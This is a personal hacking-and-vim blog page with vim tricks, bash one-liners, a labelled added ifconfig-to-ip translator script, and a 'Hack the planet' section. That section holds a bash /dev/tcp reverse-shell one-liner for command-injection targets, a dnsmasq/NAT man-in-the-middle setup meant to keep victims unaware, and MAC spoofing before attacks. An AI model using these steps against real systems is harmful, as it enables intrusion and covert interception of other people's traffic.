Welcome to badc0.de

About h4cking stuff, vim tricks, tutorials and one-liners



what you can find here...

If you're interested in useful bash commands, vim basics or efficient vim usage, you're in the right place. This won't be a classic "blog": I will write down what I think is useful and what I wish I had learned earlier. My (well-documented) dotfiles, especially my .vimrc, can be found on GitHub.


about me...

I'm a 29-year-old security enthusiast and programmer, and I love vim! In the past I successfully passed the Offensive Security Certified Professional exam, and in the near future I'm going to do some tasks from eLearnSecurity (for fun and profit?!). For a few years now I have been dealing with h4cking stuff, and along the way I learned to use and love vim.


other projects...

A few of my other projects: DumpMe, where you can see various information about yourself, analyzed from your digital footprint. Another project is PasswordsOnline. In the beginning it was a project I coded only for myself, but friends of mine told me they were also interested in it, so I published it.


Do you know vim?!

/usr/bin/vim is not an editor, it's a lifestyle...

Scrolling
12.02.2017

You can scroll the document without the need to move the cursor to the top/bottom: Ctrl-e to scroll down and Ctrl-y to scroll up.


ReadOnly
23.01.2017

Sometimes you want to open a file in read-only mode to prevent accidentally saving changes you've made on the fly (e.g. when opening /etc/passwd, some log files or whatever config files for testing). Just type:

$ view /etc/passwd

The file will be opened in vim in read-only mode, which protects you from writing ;)


Advanced Searching
21.01.2017

You might already know you can search for a string using /searchpattern. If you want to quickly switch between multiple results, you can search the whole file with:

:lvim "<input" % followed by: :lopen

This will open a result buffer at the bottom. In this buffer, every line represents a search result, containing the filename, the line number and the content of the whole matching line. You can navigate using hjkl or the cursor keys and hit Enter to jump to the matching line in the top buffer. With Ctrl-w w you can switch back to the search results.




Want some bash-foo?!

Oneliners, bashfoo and other useful tricks ;)

/sbin/ip (ifconfig is deprecated)
01.01.2017

Many Linux users are comfortable with ifconfig or route, but these tools are deprecated! The (imho better) tool is ip, which is contained in the package iproute since Ubuntu 13.10 and Debian 7. I will give you a short tutorial on using the /sbin/ip command.

For most parameters, a one-letter abbreviation is allowed. The commands are written the way you would say them out loud:

Bring interface up / down:

# Old ifconfig syntax: ifconfig eth0 up (or: ifconfig eth0 down)
# New ip syntax:
$ ip link set eth0 up
$ ip l s eth0 up
$ ip link set eth0 down
$ ip l s eth0 down

Assign IP address to interface:

# Old ifconfig syntax: ifconfig eth0 192.168.1.101 netmask 255.255.255.0
# New ip syntax:
$ ip addr add 192.168.1.101/24 dev eth0
$ ip a a 192.168.1.101/24 dev eth0

Flush interface:

# Old ifconfig syntax: ifconfig eth0 0.0.0.0
# New ip syntax:
$ ip addr flush eth0
$ ip a f eth0

Add new default route:

# Old ifconfig syntax: route add default gw 192.168.1.1 eth0
# New ip syntax:
$ ip route add default via 192.168.1.1
$ ip r a default via 192.168.1.1

It might look like more typing, but once you have worked with this command a few times you will see that it's much easier, and you can be a smart-ass when you see someone typing ifconfig or route :P
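As an added example (not code from the original post), here is a small POSIX sh translator that maps the four ifconfig/route forms above to their ip(8) equivalents, including the netmask-to-prefix-length conversion that the /24 notation needs. It only prints the ip commands and never touches an interface, so it runs without root; the function names mask2prefix and ifconfig2ip are my own.

```shell
# Added example, not part of the original post: translate the old
# ifconfig/route command lines shown above into ip(8) syntax as pure
# string manipulation (nothing is configured, no root needed).

# Convert a dotted-decimal netmask (255.255.255.0) to a prefix length (24).
# Rejects masks that are not four octets or not contiguous (255.0.255.0).
mask2prefix() {
    prefix=0; closed=0
    oldifs=$IFS; IFS=.; set -- $1; IFS=$oldifs
    [ $# -eq 4 ] || { echo "netmask must have 4 octets" >&2; return 1; }
    for octet in "$@"; do
        if [ "$closed" -eq 1 ] && [ "$octet" != 0 ]; then
            echo "non-contiguous netmask" >&2; return 1
        fi
        case $octet in
            255) prefix=$((prefix + 8)) ;;
            254) prefix=$((prefix + 7)); closed=1 ;;
            252) prefix=$((prefix + 6)); closed=1 ;;
            248) prefix=$((prefix + 5)); closed=1 ;;
            240) prefix=$((prefix + 4)); closed=1 ;;
            224) prefix=$((prefix + 3)); closed=1 ;;
            192) prefix=$((prefix + 2)); closed=1 ;;
            128) prefix=$((prefix + 1)); closed=1 ;;
            0)   closed=1 ;;
            *)   echo "invalid netmask octet: $octet" >&2; return 1 ;;
        esac
    done
    echo "$prefix"
}

# Print the ip(8) command for one old-style ifconfig or route command line,
# e.g.: ifconfig2ip ifconfig eth0 192.168.1.101 netmask 255.255.255.0
ifconfig2ip() {
    tool=$1; shift
    case "$tool $*" in
        "ifconfig "*" up" | "ifconfig "*" down")   # $1=iface $2=up|down
            echo "ip link set $1 $2" ;;
        "ifconfig "*" 0.0.0.0")                    # $1=iface
            echo "ip addr flush dev $1" ;;
        "ifconfig "*" netmask "*)                  # $1=iface $2=addr $4=mask
            prefix=$(mask2prefix "$4") || return 1
            echo "ip addr add $2/$prefix dev $1" ;;
        "route add default gw "*)                  # $4=gateway $5=iface (optional)
            echo "ip route add default via $4${5:+ dev $5}" ;;
        *)
            echo "unsupported command: $tool $*" >&2; return 1 ;;
    esac
}
```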


Netcat
18.12.2016

Simple portscan: nc -vnzw1 192.168.1.1 80

Perform a GET request to target:

echo -e "GET / HTTP/1.1\r\nHost: fritz.box\r\n\r\n" | nc 192.168.178.1 80

vi or cd
15.12.2016

Add the following piece of code to your .bashrc:


function vc {
CMDLINE=$(history 2 | head -1 | awk -F " " '{print $NF}')
[[ -f $CMDLINE ]] && $EDITOR $CMDLINE
[[ -d $CMDLINE ]] && cd $CMDLINE
}
        

What does this code do?!

It takes the last argument of the previous command and saves this string in the variable $CMDLINE. If this string is an existing file (-f), it opens the file with the default editor (assuming your $EDITOR variable is set). If not, it checks whether it's a directory (-d) and, if so, changes from the current directory to the target directory. In my case, I named the function vc (vim or cd) ;)

What's the use case?!


grep stylesheet /var/www/html/mysite/subtree/index.html # Assume you want to edit the file now...
vc # Opens $EDITOR with /var/www/html/mysite/subtree/index.html
--- or ---
ls -lahtr /etc/nginx/sites-available # Assume you want to change in this directory now...
vc # Changes from the current directory to /etc/nginx/sites-available
--- or ---
cat ../../modules/database/db-connect-params.php
vc
        



Hack the planet...!

Reverse-Shell Plain Bash
25.11.2017

When you can inject system commands on a target and want to spawn a reverse shell, but no tools like perl, python, netcat or similar are available, there's a simple way using bash built-ins:

bash -i >& /dev/tcp/{remote ip}/{remote port} 0>&1

MITM-Pre-Config
16.02.2017

If you act as a man-in-the-middle (WiFi AP, ARP spoofing, whatever) you don't want the victim to detect the malicious behavior. To do so it's recommended to set up a DNS server and a DHCP server and to provide network access (e.g. the internet).

The tool dnsmasq can be used for this case. It contains both a DHCP and a DNS server. DNS requests are forwarded to the DNS server configured in /etc/hosts, and you can specify a DHCP range in a single config file:

interface=wlan0
dhcp-range=interface:wlan0,10.0.0.50,10.0.0.99,infinite

Start dnsmasq with: $ dnsmasq -C dnsmasq.conf

What's missing?!

Enable routing/NAT:

$ echo 1 > /proc/sys/net/ipv4/ip_forward
$ iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

Troubleshooting:

Be sure to assign an IP address from the correct network to the interface before you start dnsmasq!

You can download the example dnsmasq config file here or with wget https://badc0.de/dnsmasq.conf.


Before you hack - Change your MAC
08.01.2017

Before you attack a target over a network, be sure that you don't reveal your real MAC address!

$ macchanger -r eth0

Your real (hardware) MAC address stays unchanged, and after a reboot the original settings are restored. If you want to restore it without rebooting your machine, type:

$ macchanger -p eth0

